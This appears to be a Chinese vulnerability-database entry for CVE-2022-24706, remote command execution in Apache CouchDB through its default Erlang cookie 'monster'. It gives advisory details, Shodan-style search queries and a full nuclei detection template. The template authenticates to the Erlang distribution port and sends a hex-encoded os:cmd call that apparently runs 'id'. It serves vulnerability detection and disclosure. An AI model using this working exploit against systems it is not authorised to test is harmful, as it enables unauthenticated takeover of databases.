CouchDB Erlang Distribution - Remote Command Execution

漏洞信息

漏洞名称： CouchDB Erlang Distribution - Remote Command Execution

漏洞编号：

• CVE： CVE-2022-24706

漏洞类型： 命令执行

漏洞等级： 严重

漏洞描述： Apache CouchDB是一个开源的NoSQL数据库，专注于易用性和成为“完全拥抱web的数据库”。它是一个面向文档的数据库，使用JSON格式存储数据，提供RESTful HTTP/HTTPS API接口，广泛用于Web应用程序和服务中。CouchDB的Erlang分布式协议实现中存在一个严重的安全漏洞，允许攻击者在未经验证的情况下访问默认安装的CouchDB实例，并获取管理员权限。该漏洞的技术根源在于CouchDB的默认安装中使用了硬编码的Erlang cookie值“monster”，这使得攻击者能够利用Erlang分布式协议的认证机制绕过安全限制。成功利用此漏洞的攻击者可以在受影响的系统上执行任意命令，可能导致数据泄露、服务中断或其他恶意活动。由于此漏洞不需要用户交互即可被利用，且影响范围广泛，因此被评定为严重级别。建议用户立即升级到CouchDB 3.2.2或更高版本，以修复此漏洞。

产品厂商： Apache

产品名称： CouchDB

影响版本： version < 3.2.2

搜索语法： product:”CouchDB” OR product:”couchdb” OR cpe:”cpe:2.3:a:apache:couchdb”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/5288bea871d90346cf385e92ed30c3a5882d37f7/network%2Fcves%2F2022%2FCVE-2022-24706.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2022-24706

info:
  name: CouchDB Erlang Distribution - Remote Command Execution
  author: Mzack9999,pussycat0x
  severity: critical
  description: |
    In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.
  remediation: |
    Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.
  reference:
    - https://www.exploit-db.com/exploits/50914
    - https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24706
    - http://www.openwall.com/lists/oss-security/2022/04/26/1
    - http://www.openwall.com/lists/oss-security/2022/05/09/1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24706
    cwe-id: CWE-1188
    epss-score: 0.94412
    epss-percentile: 0.99975
    cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 2
    vendor: apache
    product: couchdb
    shodan-query:
      - product:"CouchDB"
      - product:"couchdb"
      - cpe:"cpe:2.3:a:apache:couchdb"
  tags: cve2022,network,cve,couch,rce,kev,couchdb,apache,tcp

variables:
  name_msg: "00156e00050007499c4141414141414041414141414141"
  challenge_reply: "00157201020304"
  cookie: "monster"
  cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572"

tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:9100"

    inputs:
      # auth
      - data: "{{name_msg}}"
        type: hex
        read: 1024
      - read: 1024
        name: challenge
      - data: "{{challenge_reply+md5(cookie + to_string(unpack('>I',substr(challenge, 9, 13))))}}"
        type: hex
      # rce
      - data: "{{cmd}}"
        type: hex
        read: 1024

    matchers:
      - type: word
        part: raw
        words:
          - "uid"
          - "gid"
          - "groups"
        condition: and
# digest: 4a0a0047304502204734da756639045be38d801b4df76f1c1c1ef05903fa15dbd8cef2295be58bdf022100c2d6efedf4a51a7a60be68b7f979be6dde7a87638113a78483ee4150a14439c0:922c64590222798bb761d5b6d8e72950